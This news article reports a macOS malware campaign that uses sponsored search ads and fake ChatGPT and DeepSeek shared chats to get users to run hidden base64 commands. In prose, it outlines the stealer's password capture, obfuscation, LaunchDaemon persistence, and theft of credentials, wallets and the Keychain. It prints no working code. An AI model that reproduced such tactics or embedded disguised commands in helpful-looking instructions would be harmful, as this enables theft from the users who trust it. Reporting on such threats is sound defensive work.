Hackers Exploit AI Chat Platforms to Steal Passwords and Cryptocurrency
A sophisticated malware campaign has recently surfaced, exploiting legitimate AI chat platforms to deliver malicious code to unsuspecting users. Cybercriminals are leveraging sponsored Google search results to redirect individuals seeking macOS troubleshooting advice—such as how to clear storage on Mac—to counterfeit ChatGPT and DeepSeek shared chat links. These deceptive chats appear to offer helpful system instructions but are embedded with concealed malicious commands designed to compromise the user’s system.
The Attack Mechanism
The attack initiates when users encounter a seemingly legitimate shared chat providing step-by-step guidance for clearing storage space on their Mac. Within these instructions, however, are base64-encoded commands that, when executed, download and run a sophisticated multi-stage malware program. This method cleverly bypasses the safety checks typically employed by AI platforms, allowing attackers to deliver targeted, malicious instructions directly through official channels.
Infection Process
The infection process begins with a bash script that prompts users to enter their system password under the guise of credential verification. Once the password is captured, the malware uses it to escalate privileges and download the main malware binary from attacker-controlled servers. Security analysts have identified this malware as Shamus, a known information stealer and cryptocurrency thief widely documented in security communities.
Sophisticated Tactics
The malware’s sophistication lies in its multi-layered encoding and detection evasion tactics. It employs arithmetic and XOR encoding combined with a custom 6-bit decoder to conceal its malicious code from analysis tools. This obfuscation makes it extremely challenging for security researchers to identify its true functionality through static analysis alone.
Persistence and Data Theft
Once installed, the malware establishes persistent system access by creating a LaunchDaemon that runs automatically at startup, ensuring continued access even after the user restarts their computer. The core functionality targets sensitive data across multiple categories, including browser cookies and passwords from Chrome, Firefox, and 12 other Chromium-based browsers.
The threat extends to cryptocurrency wallets, with the malware specifically targeting 15 different desktop and hardware wallet applications, including Ledger Live, Trezor Suite, Exodus, Coinomi, Electrum, and Bitcoin Core. Additionally, the malware steals the entire macOS Keychain database, Telegram session data, VPN profiles, and files from the desktop and Documents folders.
Data Transmission
After collection, all stolen data is compressed and transmitted to the attacker’s command-and-control servers using encrypted communications. This campaign represents a sophisticated evolution in malware distribution, demonstrating how threat actors continue to find new ways to bypass security measures and compromise user systems.
Implications and Recommendations
This campaign underscores the evolving tactics of cybercriminals who exploit trusted platforms to distribute malware. Users are advised to exercise caution when following instructions from shared AI chat links, especially those encountered through search engine results. Verifying the authenticity of the source and being wary of prompts requesting system credentials can help mitigate the risk of infection.
Organizations should enhance their cybersecurity measures by implementing advanced threat detection systems capable of identifying and blocking such sophisticated attacks. Regular user education on recognizing phishing attempts and suspicious activities is also crucial in preventing successful breaches.
